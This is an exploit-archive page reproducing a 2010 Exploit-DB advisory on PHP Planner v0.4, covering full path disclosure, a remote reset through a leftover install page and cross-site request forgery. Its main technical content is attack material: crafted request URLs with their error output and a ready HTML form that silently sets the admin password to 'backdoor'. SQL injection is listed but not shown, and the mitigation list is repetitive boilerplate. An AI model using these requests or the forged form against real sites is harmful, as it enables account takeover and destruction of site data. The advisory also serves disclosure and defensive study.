phpplanner - exploit.company

vendor:

PHP Planner

by:

cp77fk4r

8,8

CVSS

HIGH

Full Path Disclosure, Remote System Init, Cross Site Request Forgery, SQL Injection

200, 352, 89, 89

CWE

Product Name: PHP Planner

Affected Version From: v.0.4

Affected Version To: v.0.4

Patch Exists: YES

Related CWE: N/A

CPE: phpplanner

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2010

phpplanner <= PHP Planner v.0.4 Multiple Vulnerabilities

Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Remote System Init vulnerability allows the attacker to reset the system by entering the page (.php.lock). Cross Site Request Forgery (CSRF) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. SQL Injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution.

Mitigation:

Implement input validation, use parameterized queries, use stored procedures, use least privilege, use web application firewalls, use secure coding practices, use secure authentication and authorization, use secure session management, use secure data transfer, use secure data storage, use secure data deletion, use secure data backup, use secure data archiving, use secure data recovery, use secure data encryption, use secure data integrity, use secure data access control, use secure data logging, use secure data auditing.

Source

Exploit-DB raw data:

# Title: phpplanner <= PHP Planner v.0.4 Multiple Vulnerabilities
# Date: 13/05/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://phpplanner.sourceforge.net/
# Version: <= v.0.4
# Tested on: PHP
#
##[Full Path Disclosure]
(Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the
path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain
vulnerabilities, such as using the load_file() (within a SQL Injection)
query to view the page source, require the attacker to have the full path to
the file they wish to view. (OWASP))
#
http://[server]/phpplanner/manage.php?stamp=cP
http://[server/phpplanner/index.php?view=cP
#
Will returne:
#
Warning: strftime() expects parameter 2 to be long, string given in
[FPD]\phpplanner\lib\functions.php on line 87
#and:
Warning: date() expects parameter 2 to be long, string given in
[FPD]\phpplanner\common.php on line 180
#
##[Remote System Init]
Install_mysql.php's role is to create the database tables during
installation of the system.
After the end of his job, his name will be changed to
"Install_mysql.php.lock":
(rename(__FILE__,__FILE__ . '.lock');)
#
If the attacker will enter to this page (.php.lock) the code will run again
and will reset the system.
#
##[Cross Site Request Forgery]
(CSRF is an attack which forces an end user to execute unwanted actions on a
web application in which he/she is currently authenticated. With a little
help of social engineering (like sending a link via email/chat), an attacker
may force the users of a web application to execute actions of the
attacker's choosing. A successful CSRF exploit can compromise end user data
and operation in case of normal user. If the targeted end user is the
administrator account, this can compromise the entire web application.)
(OWASP))
#
http://[server]/phpplanner/user_edit.php
#
To change the user's password:
#
HTTP GET: /user_edit.php
HTTP POST: edtUsername = [victim's user name] && edtPassword = backdoor &&
edtPassword2 =backdoor
#
PoC:
#
<form name="form1" method="post" action="http://
[server]/phpplanner/user_edit.php">
<input name="edtUsername" type="hidden" size="60"
value="admin">
<input name="edtPassword" type="hidden" size="60"
value="backdoor">
<input name="edtPassword2" type="hidden" size="60"
value="backdoor">
</form>

#
#
[e0f]